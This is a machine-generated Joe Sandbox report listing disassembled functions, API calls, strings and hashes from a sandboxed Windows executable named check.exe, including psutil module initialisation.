Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
Instruction ID: 008438083782c0a6071c008114130d4dbf46a73cc3edd42bbd57160ed46c93de
Opcode Fuzzy Hash: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
Instruction Fuzzy Hash: 6B518032A19E028ADB948F2AD444A787395EBA4FA8F108534EE5E877C4DF7CF845C740

Function 00007FF61E8EEED8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FF61E8EEF37
_CallSETranslator.LIBVCRUNTIME ref: 00007FF61E8EEF83

Strings

RCC, xrefs: 00007FF61E8EEF53
MOC, xrefs: 00007FF61E8EEF4B

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
Instruction ID: 91dbe31cad14ed3f3e1a9307f002f1b71938e8cd08d192e5e3d136e3d30f8511
Opcode Fuzzy Hash: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
Instruction Fuzzy Hash: E6618432908FC585E7619F16E4403AAB7A0FB95BA4F044625FB9C47799DF7CE194CB00

Function 00007FF61E8EF288 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF61E8EF2B0
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FF61E8EF398

Strings

csm, xrefs: 00007FF61E8EF2D2
csm, xrefs: 00007FF61E8EF3EA

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
Instruction ID: 63b4f16ff28530e1de604edcb70fa088aabb24af61380f082ff678e859e04ed9
Opcode Fuzzy Hash: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
Instruction Fuzzy Hash: 66514F32A08F4286EBB48B26954426877A0EB65FA8F144136EA5D97BD5CF3CF491C701

Function 00007FF61E8E2810 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 65windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32 ref: 00007FF61E8E28EA

Strings

ERROR, xrefs: 00007FF61E8E286F
Error, xrefs: 00007FF61E8E28DD
[PYI-%d:%ls] , xrefs: 00007FF61E8E2868

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID: Message
String ID: ERROR$Error$[PYI-%d:%ls]
API String ID: 2030045667-255084403
Opcode ID: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
Instruction ID: c300adabd522330889ab90d1e8957d7b57fe3594c73d818123f99cd67bdda44f
Opcode Fuzzy Hash: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
Instruction Fuzzy Hash: E2219F72B08F4182E7509B55B4447EA73A4EB98B90F800536FA8DD375AEF3CE645C740

Function 00007FF61E8FC5A0 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00007FF61E8FC61F
WriteFile.KERNEL32 ref: 00007FF61E8FC8E7
WriteFile.KERNEL32 ref: 00007FF61E8FC92D
GetLastError.KERNEL32 ref: 00007FF61E8FC9E3

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
Instruction ID: 7530f311fce1cb754cef2d52ad4efe1cb6e0136b7dd51d0b46a6b50e9a9232ae
Opcode Fuzzy Hash: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
Instruction Fuzzy Hash: 6CD11472B18E818AE754CF65D4402AC37B1FB64BA8B544236EE5ED7B89DE3CE116C304

Function 00007FF61E8E20C0 Relevance: 6.1, APIs: 4, Instructions: 52COMMON

Download Yara Rule

APIs

EndDialog.USER32 ref: 00007FF61E8E20F4
SetWindowLongPtrW.USER32 ref: 00007FF61E8E2116
GetWindowLongPtrW.USER32 ref: 00007FF61E8E2140
InvalidateRect.USER32 ref: 00007FF61E8E2160

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID: LongWindow$DialogInvalidateRect
String ID:
API String ID: 1956198572-0
Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
Instruction ID: bf0f486200464ae469cf92154ba5afffa08dbd6460b299a37645865784f8d1c7
Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
Instruction Fuzzy Hash: 7111EC31A0CD5241F6948B6BE5442796251EFA4FB0F844030FB4987B8ADD2DF5D18200

Function 00007FF61E905B1C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF61E901760: _invalid_parameter_noinfo.LIBCMT ref: 00007FF61E901793

_get_daylight.LIBCMT ref: 00007FF61E905C34
_get_daylight.LIBCMT ref: 00007FF61E905C45

Strings

?, xrefs: 00007FF61E905BC5

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo
String ID: ?
API String ID: 1286766494-1684325040
Opcode ID: 21862b7f5a6063227688de7d7fc5fbfc7fa1fb1d7946118fe9e576ba790fa6aa
Instruction ID: 4f33c1392833d6e5626f01442d4af5a1aaac4e92df20ef2af5f357a5044e0cb9
Opcode Fuzzy Hash: 21862b7f5a6063227688de7d7fc5fbfc7fa1fb1d7946118fe9e576ba790fa6aa
Instruction Fuzzy Hash: 22412832A08A8242FB708B25D40137A6799EBA0FB4F544635FE5CC6ADADF3CF4418700

Function 00007FF61E8F9014 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF61E8F9046

Part of subcall function 00007FF61E8FA948: RtlFreeHeap.NTDLL(?,?,?,00007FF61E902D22,?,?,?,00007FF61E902D5F,?,?,00000000,00007FF61E903225,?,?,?,00007FF61E903157), ref: 00007FF61E8FA95E
Part of subcall function 00007FF61E8FA948: GetLastError.KERNEL32(?,?,?,00007FF61E902D22,?,?,?,00007FF61E902D5F,?,?,00000000,00007FF61E903225,?,?,?,00007FF61E903157), ref: 00007FF61E8FA968

GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF61E8ECBA5), ref: 00007FF61E8F9064

Strings

C:\Users\user\AppData\Roaming\kbHYWyel\check.exe, xrefs: 00007FF61E8F9052

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
String ID: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
API String ID: 3580290477-813837819
Opcode ID: 136b352ca89953b7aac46d199a587659114d0cf60bae53edf27061cb20026a80
Instruction ID: 0582e3c10a815b45c5842cfac3dee306682805832cf1294e75dda5a30411d7e3
Opcode Fuzzy Hash: 136b352ca89953b7aac46d199a587659114d0cf60bae53edf27061cb20026a80
Instruction Fuzzy Hash: B5415C32A18F1286EB959F65D8400BD67A4EBA5FF0B594035FD4E83B86DE3CF4918300

Function 00007FF61E8FCC38 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FF61E8FCD4F
GetLastError.KERNEL32 ref: 00007FF61E8FCD71

Strings

U, xrefs: 00007FF61E8FCCFB

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
Instruction ID: 6193eb7917d8b971a3d89606816ea23b55be510a7e9c9a5285e46effb6ad8ed0
Opcode Fuzzy Hash: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
Instruction Fuzzy Hash: D541B132A18E8181DB609F25E4443AA67A4FBA8BA4F944135FE4DC7798EF3CE501C744

Function 00007FF61E8FF5B8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32 ref: 00007FF61E8FF5F8
GetCurrentDirectoryW.KERNEL32 ref: 00007FF61E8FF64A

Strings

:, xrefs: 00007FF61E8FF60E

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID: CurrentDirectory
String ID: :
API String ID: 1611563598-336475711
Opcode ID: 9aa1b1c0966d0181e71a7442aa19fd9d8a3a06258be719e39fc35e3b215e25b0
Instruction ID: a143f83be59b1a5db39f7ed4561233b3d926c2653a5fd59c483d878d9ce121c1
Opcode Fuzzy Hash: 9aa1b1c0966d0181e71a7442aa19fd9d8a3a06258be719e39fc35e3b215e25b0
Instruction Fuzzy Hash: 2521E472A18A8181EB609B15D04427D73B1FBA8F64F958035EA8DC3695DF7CF984CB81

Function 00007FF61E8EFD48 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32 ref: 00007FF61E8EFD98
RaiseException.KERNEL32 ref: 00007FF61E8EFDD9

Strings

csm, xrefs: 00007FF61E8EFDC6

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
Instruction ID: 8d16528194bfe8c54146845cfe2377a4bd028c82ab9c86ee91b5c01115ad78b4
Opcode Fuzzy Hash: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
Instruction Fuzzy Hash: F8112E32618F8182EB628F15E4402597BE5FB98F94F584630EB8D47755DF3CD591C700

Function 00007FF61E90073C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF61E90076C
GetDriveTypeW.KERNEL32 ref: 00007FF61E9007AC

Strings

:, xrefs: 00007FF61E900795

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID: DriveType_invalid_parameter_noinfo
String ID: :
API String ID: 2595371189-336475711
Opcode ID: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
Instruction ID: 2c06ec2e1bbbc54900c70a7ad1cce1e8112720ef5c17d0ab8d1cd7df4b243ecd
Opcode Fuzzy Hash: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
Instruction Fuzzy Hash: 5101A27291CE0386F761AF64986127E63A4EF68B64FC00836F64DC2682EF3CF5448B14

Analysis Process: check.exePID: 7100, Parent PID: 5596COMMON

Execution Graph

Execution Coverage:	3.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	28.1%
Total number of Nodes:	1769
Total number of Limit Nodes:	5

Executed Functions

Function 00007FFB9DD618C0 Relevance: 142.0, APIs: 44, Strings: 37, Instructions: 235
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PyModule_Create2.PYTHON3 ref: 00007FFB9DD618EB
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0 ref: 00007FFB9DD61904

Part of subcall function 00007FFB9DD613D0: PyEval_SaveThread.PYTHON3 ref: 00007FFB9DD613DA
Part of subcall function 00007FFB9DD613D0: LoadLibraryA.KERNEL32 ref: 00007FFB9DD613EA
Part of subcall function 00007FFB9DD613D0: PyEval_RestoreThread.PYTHON3 ref: 00007FFB9DD613F6
Part of subcall function 00007FFB9DD613D0: PyErr_SetFromWindowsErrWithFilename.PYTHON3 ref: 00007FFB9DD6140A

RtlGetVersion.NTDLL ref: 00007FFB9DD61945
GetSystemInfo.KERNEL32 ref: 00007FFB9DD619C1
InitializeCriticalSection.KERNEL32 ref: 00007FFB9DD619CE
PyModule_GetState.PYTHON3 ref: 00007FFB9DD619E8
PyErr_NewException.PYTHON3 ref: 00007FFB9DD619FD
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD61A1B
PyErr_NewException.PYTHON3 ref: 00007FFB9DD61A50
PyModule_AddObject.PYTHON3 ref: 00007FFB9DD61A6D
PyErr_NewException.PYTHON3 ref: 00007FFB9DD61A7F
PyModule_AddObject.PYTHON3 ref: 00007FFB9DD61A9C
PyModule_AddIntConstant.PYTHON3 ref: 00007FFB9DD61AB2
PyModule_AddIntConstant.PYTHON3 ref: 00007FFB9DD61AC8
PyModule_AddIntConstant.PYTHON3 ref: 00007FFB9DD61ADE
PyModule_AddIntConstant.PYTHON3 ref: 00007FFB9DD61AF4
PyModule_AddIntConstant.PYTHON3 ref: 00007FFB9DD61B0A
PyModule_AddIntConstant.PYTHON3 ref: 00007FFB9DD61B20
PyModule_AddIntConstant.PYTHON3 ref: 00007FFB9DD61B36
PyModule_AddIntConstant.PYTHON3 ref: 00007FFB9DD61B49
PyModule_AddIntConstant.PYTHON3 ref: 00007FFB9DD61B5F
PyModule_AddIntConstant.PYTHON3 ref: 00007FFB9DD61B75
PyModule_AddIntConstant.PYTHON3 ref: 00007FFB9DD61B8B
PyModule_AddIntConstant.PYTHON3 ref: 00007FFB9DD61BA1
PyModule_AddIntConstant.PYTHON3 ref: 00007FFB9DD61BB7
PyModule_AddIntConstant.PYTHON3 ref: 00007FFB9DD61BCD
PyModule_AddIntConstant.PYTHON3 ref: 00007FFB9DD61BE3
PyModule_AddIntConstant.PYTHON3 ref: 00007FFB9DD61BF9
PyModule_AddIntConstant.PYTHON3 ref: 00007FFB9DD61C0F
PyModule_AddIntConstant.PYTHON3 ref: 00007FFB9DD61C25
PyModule_AddIntConstant.PYTHON3 ref: 00007FFB9DD61C3B
PyModule_AddIntConstant.PYTHON3 ref: 00007FFB9DD61C51
PyModule_AddIntConstant.PYTHON3 ref: 00007FFB9DD61C67
PyModule_AddIntConstant.PYTHON3 ref: 00007FFB9DD61C7D
PyModule_AddIntConstant.PYTHON3 ref: 00007FFB9DD61C93
PyModule_AddIntConstant.PYTHON3 ref: 00007FFB9DD61CA9
PyModule_AddIntConstant.PYTHON3 ref: 00007FFB9DD61CBF
PyModule_AddIntConstant.PYTHON3 ref: 00007FFB9DD61CD5
PyModule_AddIntConstant.PYTHON3 ref: 00007FFB9DD61CEC
PyModule_AddIntConstant.PYTHON3 ref: 00007FFB9DD61D02
PyModule_AddIntConstant.PYTHON3 ref: 00007FFB9DD61D18
PyModule_AddIntConstant.PYTHON3 ref: 00007FFB9DD61D2E
PyModule_AddIntConstant.PYTHON3 ref: 00007FFB9DD61D44
PyModule_AddIntConstant.PYTHON3 ref: 00007FFB9DD61D5A

Strings

WINDOWS_8_1, xrefs: 00007FFB9DD61D3A
WINDOWS_10, xrefs: 00007FFB9DD61D50
MIB_TCP_STATE_FIN_WAIT1, xrefs: 00007FFB9DD61BD9
REALTIME_PRIORITY_CLASS, xrefs: 00007FFB9DD61B2C
MIB_TCP_STATE_CLOSING, xrefs: 00007FFB9DD61B55
ABOVE_NORMAL_PRIORITY_CLASS, xrefs: 00007FFB9DD61ABE
MIB_TCP_STATE_SYN_RCVD, xrefs: 00007FFB9DD61BC3
MIB_TCP_STATE_LAST_ACK, xrefs: 00007FFB9DD61C05
_psutil_windows.TimeoutAbandoned, xrefs: 00007FFB9DD61A76
TimeoutExpired, xrefs: 00007FFB9DD61A56
_psutil_windows.Error, xrefs: 00007FFB9DD619F1
MIB_TCP_STATE_TIME_WAIT, xrefs: 00007FFB9DD61C1B, 00007FFB9DD61C31
ERROR_PRIVILEGE_NOT_HELD, xrefs: 00007FFB9DD61CCB
ERROR_INVALID_NAME, xrefs: 00007FFB9DD61C9F
IDLE_PRIORITY_CLASS, xrefs: 00007FFB9DD61B00
MIB_TCP_STATE_DELETE_TCB, xrefs: 00007FFB9DD61C47
MIB_TCP_STATE_CLOSED, xrefs: 00007FFB9DD61B3F
ERROR_SERVICE_DOES_NOT_EXIST, xrefs: 00007FFB9DD61CB5
MIB_TCP_STATE_ESTAB, xrefs: 00007FFB9DD61B97
WINDOWS_7, xrefs: 00007FFB9DD61D0E
MIB_TCP_STATE_SYN_SENT, xrefs: 00007FFB9DD61BAD
WINVER, xrefs: 00007FFB9DD61CE2
WINDOWS_8, xrefs: 00007FFB9DD61D24
PSUTIL_DEBUG, xrefs: 00007FFB9DD618FD
WINDOWS_VISTA, xrefs: 00007FFB9DD61CF8
NORMAL_PRIORITY_CLASS, xrefs: 00007FFB9DD61B16
_psutil_windows.TimeoutExpired, xrefs: 00007FFB9DD61A47
INFINITE, xrefs: 00007FFB9DD61C73
MIB_TCP_STATE_LISTEN, xrefs: 00007FFB9DD61B81
MIB_TCP_STATE_CLOSE_WAIT, xrefs: 00007FFB9DD61B6B
HIGH_PRIORITY_CLASS, xrefs: 00007FFB9DD61AEA
version, xrefs: 00007FFB9DD61AA8
MIB_TCP_STATE_FIN_WAIT2, xrefs: 00007FFB9DD61BEF
ERROR_ACCESS_DENIED, xrefs: 00007FFB9DD61C89
BELOW_NORMAL_PRIORITY_CLASS, xrefs: 00007FFB9DD61AD4
TimeoutAbandoned, xrefs: 00007FFB9DD61A85
PSUTIL_CONN_NONE, xrefs: 00007FFB9DD61C5D

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: Module_$Constant$Err_$Exception$Eval_ObjectThread$Create2CriticalDeallocFilenameFromInfoInitializeLibraryLoadRestoreSaveSectionStateSystemVersionWindowsWithgetenv
String ID: ABOVE_NORMAL_PRIORITY_CLASS$BELOW_NORMAL_PRIORITY_CLASS$ERROR_ACCESS_DENIED$ERROR_INVALID_NAME$ERROR_PRIVILEGE_NOT_HELD$ERROR_SERVICE_DOES_NOT_EXIST$HIGH_PRIORITY_CLASS$IDLE_PRIORITY_CLASS$INFINITE$MIB_TCP_STATE_CLOSED$MIB_TCP_STATE_CLOSE_WAIT$MIB_TCP_STATE_CLOSING$MIB_TCP_STATE_DELETE_TCB$MIB_TCP_STATE_ESTAB$MIB_TCP_STATE_FIN_WAIT1$MIB_TCP_STATE_FIN_WAIT2$MIB_TCP_STATE_LAST_ACK$MIB_TCP_STATE_LISTEN$MIB_TCP_STATE_SYN_RCVD$MIB_TCP_STATE_SYN_SENT$MIB_TCP_STATE_TIME_WAIT$NORMAL_PRIORITY_CLASS$PSUTIL_CONN_NONE$PSUTIL_DEBUG$REALTIME_PRIORITY_CLASS$TimeoutAbandoned$TimeoutExpired$WINDOWS_10$WINDOWS_7$WINDOWS_8$WINDOWS_8_1$WINDOWS_VISTA$WINVER$_psutil_windows.Error$_psutil_windows.TimeoutAbandoned$_psutil_windows.TimeoutExpired$version
API String ID: 887074641-2468274236
Opcode ID: fb4df1ca4054460973fcab0e695841df0ac547bd58356957f88027a8c9bf5363
Instruction ID: d45a03752cf187df640b450e4dd06124c08ac976cbe53bb8362d24614e7b788a
Opcode Fuzzy Hash: fb4df1ca4054460973fcab0e695841df0ac547bd58356957f88027a8c9bf5363
Instruction Fuzzy Hash: 3DC1F8E4B18E0281EA709B33EA543782365AF4DBD5FC16035C98E477A4FF6DA149CB81

Function 00007FFB9DD61E90 Relevance: 43.9, APIs: 19, Strings: 6, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PyList_New.PYTHON3 ref: 00007FFB9DD61EA0
PyErr_SetFromWindowsErr.PYTHON3 ref: 00007FFB9DD61EF3
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD61F03
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFB9DD61F11

Strings

psutil-debug [%s:%d]> , xrefs: 00007FFB9DD61F61
psutil/arch/windows\cpu.c, xrefs: 00007FFB9DD61F57
GetActiveProcessorCount() not available; using GetSystemInfo(), xrefs: 00007FFB9DD61F7B
(ddddd), xrefs: 00007FFB9DD62042
